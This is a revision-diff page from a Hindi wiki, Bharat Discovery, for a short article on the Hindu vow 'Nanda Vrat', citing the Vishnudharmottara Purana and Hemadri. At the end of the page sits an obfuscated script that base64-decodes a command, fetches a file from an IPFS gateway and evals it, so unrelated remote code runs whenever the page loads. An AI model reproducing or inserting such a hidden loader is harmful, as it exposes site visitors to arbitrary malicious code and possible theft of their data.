Difference between revisions of "नन्द व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*विष्णुधर्मोत्तरपुराण<ref>विष्णुधर्मोत्तरपुराण (3|184|1-3);</ref> और हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 2, पृष्ठ 18-19)</ref> में इसका उल्लेख है।
+
*विष्णुधर्मोत्तरपुराण<ref>विष्णुधर्मोत्तरपुराण (3|184|1-3);</ref> और हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 2, पृष्ठ 18-19</ref> में इसका उल्लेख है।
  
  

Latest revision as of 12:43, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vishnudharmottarapuran[1] aur hemadri[2] mean isaka ullekh hai.


tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|184|1-3);
  2. hemadri (vratakhand 2, prishth 18-19

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>